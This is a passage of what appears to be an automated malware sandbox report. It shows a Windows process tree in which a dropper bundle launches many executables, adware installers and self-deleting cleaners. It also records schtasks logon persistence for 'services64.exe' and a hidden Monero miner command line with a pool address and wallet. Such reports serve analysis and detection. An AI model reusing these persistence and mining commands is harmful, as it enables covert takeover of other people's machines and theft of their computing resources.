                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2236
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 780
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5488
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 828
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5692
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 964
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:1056
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1004
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5312
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1052
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:1664
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1352
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:6136
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1580
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5440
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1388
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:6892
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1392
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5796
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1420
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:5960
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1388
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:2176
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1596
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:6780
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 1320
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:4280
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 904
                                                                                                                                                6⤵
                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                • Program crash
                                                                                                                                                PID:7492
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:4688
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri156ec98815f89c.exe
                                                                                                                                              Fri156ec98815f89c.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:1396
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:5024
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri155442fc38b.exe
                                                                                                                                              Fri155442fc38b.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:1832
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1599265.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1599265.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3752
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7732440.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7732440.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:5012
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4932
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7008383.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7008383.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4072
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3615448.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3615448.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:2280
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3335890.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3335890.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  PID:212
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:920
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri15af75ee9b.exe
                                                                                                                                                Fri15af75ee9b.exe
                                                                                                                                                5⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:2128
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:5028
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri157e25afd971.exe
                                                                                                                                                Fri157e25afd971.exe
                                                                                                                                                5⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:1632
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-DJ3L4.tmp\Fri157e25afd971.tmp
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-DJ3L4.tmp\Fri157e25afd971.tmp" /SL5="$801CC,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri157e25afd971.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  PID:2688
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-DBALB.tmp\zab2our.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-DBALB.tmp\zab2our.exe" /S /UID=burnerch2
                                                                                                                                                    7⤵
                                                                                                                                                      PID:3760
                                                                                                                                                      • C:\Program Files\Microsoft Office\BNYVIPAOHP\ultramediaburner.exe
                                                                                                                                                        "C:\Program Files\Microsoft Office\BNYVIPAOHP\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6012
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-OD148.tmp\ultramediaburner.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-OD148.tmp\ultramediaburner.tmp" /SL5="$20198,281924,62464,C:\Program Files\Microsoft Office\BNYVIPAOHP\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                          9⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:5288
                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                            10⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:5012
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\86-18275-4e4-7cb98-c1a0be8bc97fa\Qadyzhahitae.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\86-18275-4e4-7cb98-c1a0be8bc97fa\Qadyzhahitae.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        PID:6140
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\15-4f857-a2b-bfe85-cac05fe0ca304\Naecatumaehy.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\15-4f857-a2b-bfe85-cac05fe0ca304\Naecatumaehy.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        PID:348
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svwkewri.mi3\GcleanerEU.exe /eufive & exit
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6340
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svwkewri.mi3\GcleanerEU.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\svwkewri.mi3\GcleanerEU.exe /eufive
                                                                                                                                                              10⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:7152
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\svwkewri.mi3\GcleanerEU.exe" & exit
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:8004
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                    12⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:7212
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3n3xdvsi.xyv\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                              9⤵
                                                                                                                                                                PID:6632
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3n3xdvsi.xyv\installer.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3n3xdvsi.xyv\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  PID:3760
                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3n3xdvsi.xyv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\3n3xdvsi.xyv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630560053 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:7520
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pivq1dhf.1l3\anyname.exe & exit
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:7028
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\pivq1dhf.1l3\anyname.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\pivq1dhf.1l3\anyname.exe
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:5128
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\pivq1dhf.1l3\anyname.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\pivq1dhf.1l3\anyname.exe" -u
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4436
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:5060
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u2pbxsoe.di5\gcleaner.exe /mixfive & exit
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:5476
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\u2pbxsoe.di5\gcleaner.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\u2pbxsoe.di5\gcleaner.exe /mixfive
                                                                                                                                                                            10⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:7016
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\u2pbxsoe.di5\gcleaner.exe" & exit
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:7704
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                  12⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:7796
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vemglxv4.zrr\autosubplayer.exe /S & exit
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:4908
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c APPNAME7.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:352
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1056
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri1553f0ee90.exe
                                                                                                                                                                        Fri1553f0ee90.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:2032
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:3180
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5000
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:2284
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                  PID:5060
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:6056
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:7664
                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                      10⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:7672
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:7040
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:2520
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4460
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5072515.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5072515.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:2756
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\7176271.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\7176271.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:5568
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3266848.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3266848.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4340
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8449239.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8449239.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                    PID:1352
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3808500.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3808500.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5820
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4888
                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 4888 -s 1564
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:5020
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:400
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                  PID:1400
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 804
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:5156
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 832
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:5720
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 856
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:6116
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 892
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:5156
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 992
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:5796
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1196
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:6128
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:2264
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5280
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4668
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:1036
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:2160
                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4400
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                        PID:3916
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-V7O34.tmp\setup_2.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-V7O34.tmp\setup_2.tmp" /SL5="$10242,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5020
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:3636
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-JN217.tmp\setup_2.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-JN217.tmp\setup_2.tmp" /SL5="$40272,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5012
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3N6DL.tmp\postback.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3N6DL.tmp\postback.exe" ss1
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:5552
                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                  explorer.exe ss1
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5548
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
